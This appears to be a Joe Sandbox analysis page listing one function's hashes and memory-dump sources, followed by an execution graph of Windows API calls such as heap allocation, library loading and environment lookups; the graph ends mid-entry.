                                                                                                                                                                                                                                                    Function 00007FF69F3FFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000011.00000002.2078570167.00007FF69F3E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF69F3E0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078539329.00007FF69F3E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078609505.00007FF69F40B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F41E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078646039.00007FF69F424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000011.00000002.2078698878.00007FF69F426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ff69f3e0000_7405.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                                                                    • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                    • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                    • Instruction ID: ce4435b1b104543b1d463445d72983f1c653285747bd523dc6b923c6c237648f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5701F221A2C24782FBB0AF60D46127E23A0EF58708F86017AD94CCA282DF3CE404DF44

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:795
                                                                                                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                                                                                                    execution_graph 55564 7ffdffc36110 55565 7ffdffc36124 55564->55565 55566 7ffdffc36138 55564->55566 55568 7ffdffc36161 55565->55568 55577 7ffdffc3626c 55565->55577 55617 7ffdffc6a4a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 55566->55617 55569 7ffdffc36211 55568->55569 55570 7ffdffc3616a 55568->55570 55610 7ffdffc376f0 55569->55610 55572 7ffdffc3616f GetLastError 55570->55572 55573 7ffdffc361e9 55570->55573 55571 7ffdffc361d5 55575 7ffdffc36186 55572->55575 55576 7ffdffc3618b 55572->55576 55573->55571 55578 7ffdffc361f9 55573->55578 55618 7ffdffc33a40 6 API calls _set_errno_from_matherr 55575->55618 55585 7ffdffc36197 55576->55585 55621 7ffdffc362cc 6 API calls _set_errno_from_matherr 55576->55621 55577->55571 55638 7ffdffc377ec 117 API calls 55577->55638 55620 7ffdffc33a40 6 API calls _set_errno_from_matherr 55578->55620 55583 7ffdffc36223 55586 7ffdffc362b7 SetLastError 55583->55586 55622 7ffdffc2dcf0 55583->55622 55584 7ffdffc361fe 55584->55571 55641 7ffdffc362cc 6 API calls _set_errno_from_matherr 55584->55641 55585->55586 55588 7ffdffc361a1 55585->55588 55586->55571 55588->55586 55591 7ffdffc361aa 55588->55591 55619 7ffdffc33a40 6 API calls _set_errno_from_matherr 55591->55619 55592 7ffdffc36248 55635 7ffdffc362cc 6 API calls _set_errno_from_matherr 55592->55635 55593 7ffdffc362a9 55639 7ffdffc362cc 6 API calls _set_errno_from_matherr 55593->55639 55594 7ffdffc733ef 55642 7ffdffc3f930 29 API calls __std_type_info_destroy_list 55594->55642 55599 7ffdffc361b5 SetLastError 55599->55571 55600 7ffdffc361d0 55599->55600 55600->55571 55601 7ffdffc362b0 55640 7ffdffc2f040 25 API calls 2 library calls 55601->55640 55602 7ffdffc36250 55603 7ffdffc36258 55602->55603 55604 7ffdffc73408 55602->55604 55636 7ffdffc363a4 25 API calls _set_errno_from_matherr 55603->55636 55643 7ffdffc362cc 6 API calls _set_errno_from_matherr 55604->55643 55608 7ffdffc36260 55637 7ffdffc2f040 25 API calls 2 library calls 55608->55637 55644 7ffdffc6967c 55610->55644 55612 7ffdffc3773d 55615 7ffdffc37746 55612->55615 55660 7ffdffc696bc 8 API calls 3 library calls 55612->55660 55613 7ffdffc37704 55613->55612 55652 7ffdffc3c7f0 EnterCriticalSection 55613->55652 55615->55571 55617->55565 55618->55576 55619->55599 55620->55584 55621->55583 55623 7ffdffc2dd01 55622->55623 55624 7ffdffc2dd16 HeapAlloc 55622->55624 55623->55624 55625 7ffdffc70f6e 55623->55625 55626 7ffdffc70f80 55624->55626 55627 7ffdffc2dd47 55624->55627 55714 7ffdffc33440 25 API calls 2 library calls 55625->55714 55630 7ffdffc70fb9 55626->55630 55634 7ffdffc70f9f HeapAlloc 55626->55634 55715 7ffdffc23964 8 API calls _set_errno_from_matherr 55626->55715 55716 7ffdffc8c860 10 API calls _set_errno_from_matherr 55626->55716 55627->55592 55627->55593 55717 7ffdffc33440 25 API calls 2 library calls 55630->55717 55633 7ffdffc70fc3 55634->55626 55634->55630 55635->55602 55636->55608 55637->55585 55638->55571 55639->55601 55640->55586 55641->55594 55642->55600 55643->55601 55645 7ffdffc69685 __vcrt_initialize_winapi_thunks 55644->55645 55661 7ffdffc69c98 55645->55661 55648 7ffdffc69698 55648->55613 55650 7ffdffc696a1 55650->55648 55668 7ffdffc69d04 DeleteCriticalSection 55650->55668 55685 7ffdffc3c998 55652->55685 55654 7ffdffc3c80c 55655 7ffdffc3c81c LeaveCriticalSection 55654->55655 55696 7ffdffc3c93c 79 API calls 55654->55696 55655->55613 55657 7ffdffc3c815 55697 7ffdffc3c838 GetStdHandle GetFileType 55657->55697 55659 7ffdffc3c81a 55659->55655 55660->55612 55663 7ffdffc69ca0 55661->55663 55664 7ffdffc69cd1 55663->55664 55665 7ffdffc69694 55663->55665 55669 7ffdffc6a0a0 55663->55669 55674 7ffdffc69d04 DeleteCriticalSection 55664->55674 55665->55648 55667 7ffdffc69854 8 API calls 2 library calls 55665->55667 55667->55650 55668->55648 55675 7ffdffc69d88 55669->55675 55672 7ffdffc6a0eb InitializeCriticalSectionAndSpinCount 55673 7ffdffc6a0e0 55672->55673 55673->55663 55674->55665 55676 7ffdffc69de9 55675->55676 55677 7ffdffc69de4 try_get_function 55675->55677 55676->55672 55676->55673 55677->55676 55678 7ffdffc69e18 LoadLibraryExW 55677->55678 55681 7ffdffc69ecc 55677->55681 55683 7ffdffc69eb1 FreeLibrary 55677->55683 55684 7ffdffc69e73 LoadLibraryExW 55677->55684 55678->55677 55679 7ffdffc69e39 GetLastError 55678->55679 55679->55677 55680 7ffdffc69eda GetProcAddress 55682 7ffdffc69eeb 55680->55682 55681->55676 55681->55680 55682->55676 55683->55677 55684->55677 55686 7ffdffc75b28 55685->55686 55687 7ffdffc3c9bb EnterCriticalSection 55685->55687 55710 7ffdffc33440 25 API calls 2 library calls 55686->55710 55691 7ffdffc3c9d3 55687->55691 55689 7ffdffc75b2d 55711 7ffdffc42370 73 API calls wmemmove_s 55689->55711 55690 7ffdffc3ca12 LeaveCriticalSection 55690->55654 55691->55690 55695 7ffdffc3ca0d 55691->55695 55698 7ffdffc3ca40 55691->55698 55694 7ffdffc75b39 55695->55690 55696->55657 55697->55659 55699 7ffdffc2dcf0 _set_errno_from_matherr 25 API calls 55698->55699 55701 7ffdffc3ca54 55699->55701 55700 7ffdffc3cb24 55712 7ffdffc2f040 25 API calls 2 library calls 55700->55712 55701->55700 55704 7ffdffc75b83 InitializeCriticalSectionAndSpinCount 55701->55704 55705 7ffdffc75b40 55701->55705 55703 7ffdffc3cb42 55703->55691 55706 7ffdffc75b98 GetProcAddress 55704->55706 55705->55706 55708 7ffdffc75b5c 55705->55708 55713 7ffdffc3bfe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_function 55705->55713 55706->55708 55708->55704 55709 7ffdffc75bdb 55708->55709 55709->55709 55710->55689 55711->55694 55712->55703 55713->55705 55714->55627 55715->55626 55716->55626 55717->55633 55718 7ff69f3e2d00 55719 7ff69f3e2d10 55718->55719 55720 7ff69f3e2d61 55719->55720 55721 7ff69f3e2d4b 55719->55721 55723 7ff69f3e2d81 55720->55723 55734 7ff69f3e2d97 __vcrt_freefls 55720->55734 55774 7ff69f3e25f0 53 API calls _log10_special 55721->55774 55775 7ff69f3e25f0 53 API calls _log10_special 55723->55775 55726 7ff69f3e2d57 __vcrt_freefls 55776 7ff69f3eb870 55726->55776 55729 7ff69f3e3069 55791 7ff69f3e25f0 53 API calls _log10_special 55729->55791 55732 7ff69f3e3053 55790 7ff69f3e25f0 53 API calls _log10_special 55732->55790 55734->55726 55734->55729 55734->55732 55735 7ff69f3e302d 55734->55735 55737 7ff69f3e2f27 55734->55737 55746 7ff69f3e1440 55734->55746 55770 7ff69f3e1bf0 55734->55770 55789 7ff69f3e25f0 53 API calls _log10_special 55735->55789 55738 7ff69f3e2f93 55737->55738 55785 7ff69f3f9714 37 API calls 2 library calls 55737->55785 55740 7ff69f3e2fbe 55738->55740 55741 7ff69f3e2fb0 55738->55741 55787 7ff69f3e2af0 37 API calls 55740->55787 55786 7ff69f3f9714 37 API calls 2 library calls 55741->55786 55744 7ff69f3e2fbc 55788 7ff69f3e2470 54 API calls __vcrt_freefls 55744->55788 55792 7ff69f3e3f70 55746->55792 55749 7ff69f3e146b 55828 7ff69f3e25f0 53 API calls _log10_special 55749->55828 55750 7ff69f3e148c 55802 7ff69f3ef9f4 55750->55802 55753 7ff69f3e14a1 55755 7ff69f3e14a5 55753->55755 55756 7ff69f3e14c1 55753->55756 55754 7ff69f3e147b 55754->55734 55829 7ff69f3e2760 53 API calls 2 library calls 55755->55829 55758 7ff69f3e14f1 55756->55758 55759 7ff69f3e14d1 55756->55759 55762 7ff69f3e14f7 55758->55762 55767 7ff69f3e150a 55758->55767 55830 7ff69f3e2760 53 API calls 2 library calls 55759->55830 55806 7ff69f3e11f0 55762->55806 55763 7ff69f3e1584 55763->55734 55765 7ff69f3e14bc __vcrt_freefls 55824 7ff69f3ef36c 55765->55824 55767->55765 55768 7ff69f3e1596 55767->55768 55831 7ff69f3ef6bc 55767->55831 55834 7ff69f3e2760 53 API calls 2 library calls 55768->55834 55771 7ff69f3e1c15 55770->55771 56076 7ff69f3f3ca4 55771->56076 55774->55726 55775->55726 55777 7ff69f3eb879 55776->55777 55778 7ff69f3e2f1a 55777->55778 55779 7ff69f3ebc00 IsProcessorFeaturePresent 55777->55779 55780 7ff69f3ebc18 55779->55780 56103 7ff69f3ebdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 55780->56103 55782 7ff69f3ebc2b 56104 7ff69f3ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 55782->56104 55785->55738 55786->55744 55787->55744 55788->55726 55789->55726 55790->55726 55791->55726 55793 7ff69f3e3f7c 55792->55793 55835 7ff69f3e86b0 55793->55835 55795 7ff69f3e3fa4 55796 7ff69f3e86b0 2 API calls 55795->55796 55797 7ff69f3e3fb7 55796->55797 55840 7ff69f3f52a4 55797->55840 55800 7ff69f3eb870 _log10_special 8 API calls 55801 7ff69f3e1463 55800->55801 55801->55749 55801->55750 55803 7ff69f3efa24 55802->55803 56011 7ff69f3ef784 55803->56011 55805 7ff69f3efa3d 55805->55753 55807 7ff69f3e1248 55806->55807 55808 7ff69f3e124f 55807->55808 55809 7ff69f3e1277 55807->55809 56028 7ff69f3e25f0 53 API calls _log10_special 55808->56028 55812 7ff69f3e1291 55809->55812 55813 7ff69f3e12ad 55809->55813 55811 7ff69f3e1262 55811->55765 56029 7ff69f3e2760 53 API calls 2 library calls 55812->56029 55815 7ff69f3e12bf 55813->55815 55822 7ff69f3e12db memcpy_s 55813->55822 56030 7ff69f3e2760 53 API calls 2 library calls 55815->56030 55817 7ff69f3ef6bc _fread_nolock 53 API calls 55817->55822 55818 7ff69f3e12a8 __vcrt_freefls 55818->55765 55819 7ff69f3e139f 56031 7ff69f3e25f0 53 API calls _log10_special 55819->56031 55822->55817 55822->55818 55822->55819 55823 7ff69f3ef430 37 API calls 55822->55823 56024 7ff69f3efdfc 55822->56024 55823->55822 55825 7ff69f3ef39c 55824->55825 56048 7ff69f3ef148 55825->56048 55827 7ff69f3ef3b5 55827->55763 55828->55754 55829->55765 55830->55765 56060 7ff69f3ef6dc 55831->56060 55834->55765 55836 7ff69f3e86d2 MultiByteToWideChar 55835->55836 55839 7ff69f3e86f6 55835->55839 55837 7ff69f3e870c __vcrt_freefls 55836->55837 55836->55839 55837->55795 55838 7ff69f3e8713 MultiByteToWideChar 55838->55837 55839->55837 55839->55838 55841 7ff69f3f51d8 55840->55841 55842 7ff69f3f51fe 55841->55842 55844 7ff69f3f5231 55841->55844 55871 7ff69f3f43f4 11 API calls _get_daylight 55842->55871 55847 7ff69f3f5244 55844->55847 55848 7ff69f3f5237 55844->55848 55845 7ff69f3f5203 55872 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55845->55872 55859 7ff69f3f9f38 55847->55859 55873 7ff69f3f43f4 11 API calls _get_daylight 55848->55873 55852 7ff69f3f5265 55866 7ff69f3ff1dc 55852->55866 55853 7ff69f3f5258 55874 7ff69f3f43f4 11 API calls _get_daylight 55853->55874 55856 7ff69f3f5278 55875 7ff69f3f4788 LeaveCriticalSection 55856->55875 55858 7ff69f3e3fc6 55858->55800 55876 7ff69f3ff5e8 EnterCriticalSection 55859->55876 55861 7ff69f3f9f4f 55862 7ff69f3f9fac 19 API calls 55861->55862 55863 7ff69f3f9f5a 55862->55863 55864 7ff69f3ff648 _isindst LeaveCriticalSection 55863->55864 55865 7ff69f3f524e 55864->55865 55865->55852 55865->55853 55877 7ff69f3feed8 55866->55877 55869 7ff69f3ff236 55869->55856 55871->55845 55872->55858 55873->55858 55874->55858 55882 7ff69f3fef13 __vcrt_FlsAlloc 55877->55882 55879 7ff69f3ff1b1 55896 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55879->55896 55881 7ff69f3ff0e3 55881->55869 55889 7ff69f406064 55881->55889 55882->55882 55887 7ff69f3ff0da 55882->55887 55892 7ff69f3f6d4c 51 API calls 3 library calls 55882->55892 55884 7ff69f3ff145 55884->55887 55893 7ff69f3f6d4c 51 API calls 3 library calls 55884->55893 55886 7ff69f3ff164 55886->55887 55894 7ff69f3f6d4c 51 API calls 3 library calls 55886->55894 55887->55881 55895 7ff69f3f43f4 11 API calls _get_daylight 55887->55895 55897 7ff69f405664 55889->55897 55892->55884 55893->55886 55894->55887 55895->55879 55896->55881 55898 7ff69f40567b 55897->55898 55899 7ff69f405699 55897->55899 55951 7ff69f3f43f4 11 API calls _get_daylight 55898->55951 55899->55898 55901 7ff69f4056b5 55899->55901 55908 7ff69f405c74 55901->55908 55902 7ff69f405680 55952 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55902->55952 55905 7ff69f40568c 55905->55869 55954 7ff69f4059a8 55908->55954 55911 7ff69f405d01 55973 7ff69f3f7830 55911->55973 55912 7ff69f405ce9 55985 7ff69f3f43d4 11 API calls _get_daylight 55912->55985 55916 7ff69f405cee 55986 7ff69f3f43f4 11 API calls _get_daylight 55916->55986 55944 7ff69f4056e0 55944->55905 55953 7ff69f3f7808 LeaveCriticalSection 55944->55953 55951->55902 55952->55905 55955 7ff69f4059d4 55954->55955 55962 7ff69f4059ee 55954->55962 55955->55962 55998 7ff69f3f43f4 11 API calls _get_daylight 55955->55998 55957 7ff69f4059e3 55999 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55957->55999 55959 7ff69f405abd 55971 7ff69f405b1a 55959->55971 56004 7ff69f3f8e90 37 API calls 2 library calls 55959->56004 55960 7ff69f405a6c 55960->55959 56002 7ff69f3f43f4 11 API calls _get_daylight 55960->56002 55962->55960 56000 7ff69f3f43f4 11 API calls _get_daylight 55962->56000 55964 7ff69f405b16 55964->55971 56005 7ff69f3f9c10 IsProcessorFeaturePresent 55964->56005 55966 7ff69f405ab2 56003 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55966->56003 55967 7ff69f405a61 56001 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 55967->56001 55971->55911 55971->55912 56010 7ff69f3ff5e8 EnterCriticalSection 55973->56010 55985->55916 55986->55944 55998->55957 55999->55962 56000->55967 56001->55960 56002->55966 56003->55959 56004->55964 56006 7ff69f3f9c23 56005->56006 56009 7ff69f3f9924 14 API calls 3 library calls 56006->56009 56008 7ff69f3f9c3e GetCurrentProcess TerminateProcess 56009->56008 56012 7ff69f3ef7ee 56011->56012 56013 7ff69f3ef7ae 56011->56013 56012->56013 56015 7ff69f3ef7fa 56012->56015 56023 7ff69f3f9b24 37 API calls 2 library calls 56013->56023 56022 7ff69f3f477c EnterCriticalSection 56015->56022 56016 7ff69f3ef7d5 56016->55805 56018 7ff69f3ef7ff 56019 7ff69f3ef908 71 API calls 56018->56019 56020 7ff69f3ef811 56019->56020 56021 7ff69f3f4788 _fread_nolock LeaveCriticalSection 56020->56021 56021->56016 56023->56016 56025 7ff69f3efe2c 56024->56025 56032 7ff69f3efb4c 56025->56032 56027 7ff69f3efe4a 56027->55822 56028->55811 56029->55818 56030->55818 56031->55818 56033 7ff69f3efb6c 56032->56033 56034 7ff69f3efb99 56032->56034 56033->56034 56035 7ff69f3efba1 56033->56035 56036 7ff69f3efb76 56033->56036 56034->56027 56039 7ff69f3efa8c 56035->56039 56046 7ff69f3f9b24 37 API calls 2 library calls 56036->56046 56047 7ff69f3f477c EnterCriticalSection 56039->56047 56041 7ff69f3efaa9 56042 7ff69f3efacc 74 API calls 56041->56042 56043 7ff69f3efab2 56042->56043 56044 7ff69f3f4788 _fread_nolock LeaveCriticalSection 56043->56044 56045 7ff69f3efabd 56044->56045 56045->56034 56046->56034 56049 7ff69f3ef163 56048->56049 56050 7ff69f3ef191 56048->56050 56059 7ff69f3f9b24 37 API calls 2 library calls 56049->56059 56052 7ff69f3ef183 56050->56052 56058 7ff69f3f477c EnterCriticalSection 56050->56058 56052->55827 56054 7ff69f3ef1a8 56055 7ff69f3ef1c4 72 API calls 56054->56055 56056 7ff69f3ef1b4 56055->56056 56057 7ff69f3f4788 _fread_nolock LeaveCriticalSection 56056->56057 56057->56052 56059->56052 56061 7ff69f3ef706 56060->56061 56072 7ff69f3ef6d4 56060->56072 56062 7ff69f3ef715 __scrt_get_show_window_mode 56061->56062 56063 7ff69f3ef752 56061->56063 56061->56072 56074 7ff69f3f43f4 11 API calls _get_daylight 56062->56074 56073 7ff69f3f477c EnterCriticalSection 56063->56073 56066 7ff69f3ef75a 56068 7ff69f3ef45c _fread_nolock 51 API calls 56066->56068 56067 7ff69f3ef72a 56075 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 56067->56075 56070 7ff69f3ef771 56068->56070 56071 7ff69f3f4788 _fread_nolock LeaveCriticalSection 56070->56071 56071->56072 56072->55767 56074->56067 56075->56072 56080 7ff69f3f3cfe 56076->56080 56077 7ff69f3f3d23 56094 7ff69f3f9b24 37 API calls 2 library calls 56077->56094 56079 7ff69f3f3d5f 56095 7ff69f3f1f30 49 API calls _invalid_parameter_noinfo 56079->56095 56080->56077 56080->56079 56082 7ff69f3f3d4d 56084 7ff69f3eb870 _log10_special 8 API calls 56082->56084 56083 7ff69f3f9c58 __free_lconv_mon 11 API calls 56083->56082 56086 7ff69f3e1c38 56084->56086 56085 7ff69f3f3df6 56087 7ff69f3f3e3c 56085->56087 56088 7ff69f3f3e60 56085->56088 56089 7ff69f3f3e11 56085->56089 56090 7ff69f3f3e08 56085->56090 56086->55734 56087->56083 56088->56087 56091 7ff69f3f3e6a 56088->56091 56096 7ff69f3f9c58 56089->56096 56090->56087 56090->56089 56093 7ff69f3f9c58 __free_lconv_mon 11 API calls 56091->56093 56093->56082 56094->56082 56095->56085 56097 7ff69f3f9c8c 56096->56097 56098 7ff69f3f9c5d RtlFreeHeap 56096->56098 56097->56082 56098->56097 56099 7ff69f3f9c78 GetLastError 56098->56099 56100 7ff69f3f9c85 __free_lconv_mon 56099->56100 56102 7ff69f3f43f4 11 API calls _get_daylight 56100->56102 56102->56097 56103->55782 56105 7ff69f3ebf5c 56126 7ff69f3ec12c 56105->56126 56108 7ff69f3ec0a8 56245 7ff69f3ec44c 7 API calls 2 library calls 56108->56245 56109 7ff69f3ebf78 __scrt_acquire_startup_lock 56111 7ff69f3ec0b2 56109->56111 56116 7ff69f3ebf96 __scrt_release_startup_lock 56109->56116 56246 7ff69f3ec44c 7 API calls 2 library calls 56111->56246 56113 7ff69f3ebfbb 56114 7ff69f3ec0bd __GetCurrentState 56115 7ff69f3ec041 56132 7ff69f3ec594 56115->56132 56116->56113 56116->56115 56242 7ff69f3f8e44 45 API calls 56116->56242 56118 7ff69f3ec046 56135 7ff69f3e1000 56118->56135 56123 7ff69f3ec069 56123->56114 56244 7ff69f3ec2b0 7 API calls 56123->56244 56125 7ff69f3ec080 56125->56113 56127 7ff69f3ec134 56126->56127 56128 7ff69f3ec140 __scrt_dllmain_crt_thread_attach 56127->56128 56129 7ff69f3ebf70 56128->56129 56130 7ff69f3ec14d 56128->56130 56129->56108 56129->56109 56130->56129 56247 7ff69f3ecba8 7 API calls 2 library calls 56130->56247 56248 7ff69f4097e0 56132->56248 56134 7ff69f3ec5ab GetStartupInfoW 56134->56118 56136 7ff69f3e1009 56135->56136 56250 7ff69f3f4794 56136->56250 56138 7ff69f3e352b 56257 7ff69f3e33e0 56138->56257 56142 7ff69f3eb870 _log10_special 8 API calls 56144 7ff69f3e372a 56142->56144 56243 7ff69f3ec5d8 GetModuleHandleW 56144->56243 56145 7ff69f3e356c 56148 7ff69f3e1bf0 49 API calls 56145->56148 56146 7ff69f3e3736 56147 7ff69f3e3f70 108 API calls 56146->56147 56149 7ff69f3e3746 56147->56149 56165 7ff69f3e3588 56148->56165 56150 7ff69f3e3785 56149->56150 56347 7ff69f3e76a0 56149->56347 56356 7ff69f3e25f0 53 API calls _log10_special 56150->56356 56154 7ff69f3e3778 56157 7ff69f3e379f 56154->56157 56158 7ff69f3e377d 56154->56158 56155 7ff69f3e3538 56155->56142 56156 7ff69f3e365f __vcrt_freefls 56159 7ff69f3e3844 56156->56159 56163 7ff69f3e7e10 14 API calls 56156->56163 56161 7ff69f3e1bf0 49 API calls 56157->56161 56160 7ff69f3ef36c 74 API calls 56158->56160 56360 7ff69f3e3e90 49 API calls 56159->56360 56160->56150 56162 7ff69f3e37be 56161->56162 56171 7ff69f3e18f0 115 API calls 56162->56171 56166 7ff69f3e36ae 56163->56166 56319 7ff69f3e7e10 56165->56319 56345 7ff69f3e7f80 40 API calls __vcrt_freefls 56166->56345 56167 7ff69f3e3852 56169 7ff69f3e3865 56167->56169 56170 7ff69f3e3871 56167->56170 56361 7ff69f3e3fe0 56169->56361 56174 7ff69f3e1bf0 49 API calls 56170->56174 56175 7ff69f3e37df 56171->56175 56172 7ff69f3e36bd 56176 7ff69f3e380f 56172->56176 56178 7ff69f3e36cf 56172->56178 56190 7ff69f3e3805 __vcrt_freefls 56174->56190 56175->56165 56177 7ff69f3e37ef 56175->56177 56358 7ff69f3e8400 58 API calls _log10_special 56176->56358 56357 7ff69f3e25f0 53 API calls _log10_special 56177->56357 56182 7ff69f3e1bf0 49 API calls 56178->56182 56180 7ff69f3e86b0 2 API calls 56184 7ff69f3e389e SetDllDirectoryW 56180->56184 56186 7ff69f3e36f1 56182->56186 56183 7ff69f3e3814 56359 7ff69f3e7c40 84 API calls 2 library calls 56183->56359 56189 7ff69f3e38c3 56184->56189 56186->56190 56191 7ff69f3e36fc 56186->56191 56193 7ff69f3e3a50 56189->56193 56364 7ff69f3e6560 53 API calls 56189->56364 56190->56180 56346 7ff69f3e25f0 53 API calls _log10_special 56191->56346 56192 7ff69f3e3834 56192->56159 56192->56190 56196 7ff69f3e3a5a PostMessageW GetMessageW 56193->56196 56197 7ff69f3e3a7d 56193->56197 56196->56197 56332 7ff69f3e3080 56197->56332 56198 7ff69f3e38d5 56365 7ff69f3e6b00 118 API calls 2 library calls 56198->56365 56200 7ff69f3e38ea 56202 7ff69f3e3947 56200->56202 56204 7ff69f3e3901 56200->56204 56366 7ff69f3e65a0 121 API calls _log10_special 56200->56366 56202->56193 56210 7ff69f3e395c 56202->56210 56217 7ff69f3e3905 56204->56217 56367 7ff69f3e6970 91 API calls 56204->56367 56208 7ff69f3e3916 56208->56217 56368 7ff69f3e6cd0 54 API calls 56208->56368 56371 7ff69f3e30e0 122 API calls 2 library calls 56210->56371 56214 7ff69f3e3aa3 56215 7ff69f3e3964 56215->56155 56216 7ff69f3e396c 56215->56216 56372 7ff69f3e83e0 LocalFree 56216->56372 56217->56202 56369 7ff69f3e2870 53 API calls _log10_special 56217->56369 56220 7ff69f3e393f 56370 7ff69f3e6780 FreeLibrary 56220->56370 56242->56115 56243->56123 56244->56125 56245->56111 56246->56114 56247->56129 56249 7ff69f4097d0 56248->56249 56249->56134 56249->56249 56253 7ff69f3fe790 56250->56253 56251 7ff69f3fe7e3 56374 7ff69f3f9b24 37 API calls 2 library calls 56251->56374 56253->56251 56254 7ff69f3fe836 56253->56254 56375 7ff69f3fe668 71 API calls _fread_nolock 56254->56375 56256 7ff69f3fe80c 56256->56138 56376 7ff69f3ebb70 56257->56376 56260 7ff69f3e341b 56383 7ff69f3e29e0 51 API calls _log10_special 56260->56383 56261 7ff69f3e3438 56378 7ff69f3e85a0 FindFirstFileExW 56261->56378 56265 7ff69f3e34a5 56386 7ff69f3e8760 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 56265->56386 56266 7ff69f3e344b 56384 7ff69f3e8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 56266->56384 56268 7ff69f3eb870 _log10_special 8 API calls 56271 7ff69f3e34dd 56268->56271 56270 7ff69f3e3458 56272 7ff69f3e345c 56270->56272 56275 7ff69f3e3474 __vcrt_FlsAlloc 56270->56275 56271->56155 56279 7ff69f3e18f0 56271->56279 56385 7ff69f3e26c0 49 API calls _log10_special 56272->56385 56273 7ff69f3e34b3 56278 7ff69f3e342e 56273->56278 56387 7ff69f3e26c0 49 API calls _log10_special 56273->56387 56275->56265 56277 7ff69f3e346d 56277->56278 56278->56268 56280 7ff69f3e3f70 108 API calls 56279->56280 56281 7ff69f3e1925 56280->56281 56282 7ff69f3e1bb6 56281->56282 56284 7ff69f3e76a0 83 API calls 56281->56284 56283 7ff69f3eb870 _log10_special 8 API calls 56282->56283 56285 7ff69f3e1bd1 56283->56285 56286 7ff69f3e196b 56284->56286 56285->56145 56285->56146 56288 7ff69f3ef9f4 73 API calls 56286->56288 56295 7ff69f3e199c 56286->56295 56287 7ff69f3ef36c 74 API calls 56287->56282 56289 7ff69f3e1985 56288->56289 56290 7ff69f3e19a1 56289->56290 56291 7ff69f3e1989 56289->56291 56292 7ff69f3ef6bc _fread_nolock 53 API calls 56290->56292 56388 7ff69f3e2760 53 API calls 2 library calls 56291->56388 56294 7ff69f3e19b9 56292->56294 56296 7ff69f3e19bf 56294->56296 56297 7ff69f3e19d7 56294->56297 56295->56287 56389 7ff69f3e2760 53 API calls 2 library calls 56296->56389 56299 7ff69f3e19ee 56297->56299 56300 7ff69f3e1a06 56297->56300 56390 7ff69f3e2760 53 API calls 2 library calls 56299->56390 56302 7ff69f3e1bf0 49 API calls 56300->56302 56303 7ff69f3e1a1d 56302->56303 56304 7ff69f3e1bf0 49 API calls 56303->56304 56305 7ff69f3e1a68 56304->56305 56306 7ff69f3ef9f4 73 API calls 56305->56306 56307 7ff69f3e1a8c 56306->56307 56308 7ff69f3e1aa1 56307->56308 56309 7ff69f3e1ab9 56307->56309 56391 7ff69f3e2760 53 API calls 2 library calls 56308->56391 56311 7ff69f3ef6bc _fread_nolock 53 API calls 56309->56311 56312 7ff69f3e1ace 56311->56312 56313 7ff69f3e1ad4 56312->56313 56314 7ff69f3e1aec 56312->56314 56392 7ff69f3e2760 53 API calls 2 library calls 56313->56392 56393 7ff69f3ef430 37 API calls 2 library calls 56314->56393 56317 7ff69f3e1b06 56317->56295 56394 7ff69f3e25f0 53 API calls _log10_special 56317->56394 56320 7ff69f3e7e1a 56319->56320 56321 7ff69f3e86b0 2 API calls 56320->56321 56322 7ff69f3e7e39 GetEnvironmentVariableW 56321->56322 56323 7ff69f3e7ea2 56322->56323 56324 7ff69f3e7e56 ExpandEnvironmentStringsW 56322->56324 56326 7ff69f3eb870 _log10_special 8 API calls 56323->56326 56324->56323 56325 7ff69f3e7e78 56324->56325 56395 7ff69f3e8760 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 56325->56395 56328 7ff69f3e7eb4 56326->56328 56328->56156 56329 7ff69f3e7e8a 56330 7ff69f3eb870 _log10_special 8 API calls 56329->56330 56331 7ff69f3e7e9a 56330->56331 56331->56156 56396 7ff69f3e5af0 56332->56396 56335 7ff69f3e30b9 56341 7ff69f3e33a0 56335->56341 56337 7ff69f3e30a1 56337->56335 56466 7ff69f3e5800 56337->56466 56339 7ff69f3e30ad 56339->56335 56475 7ff69f3e5990 53 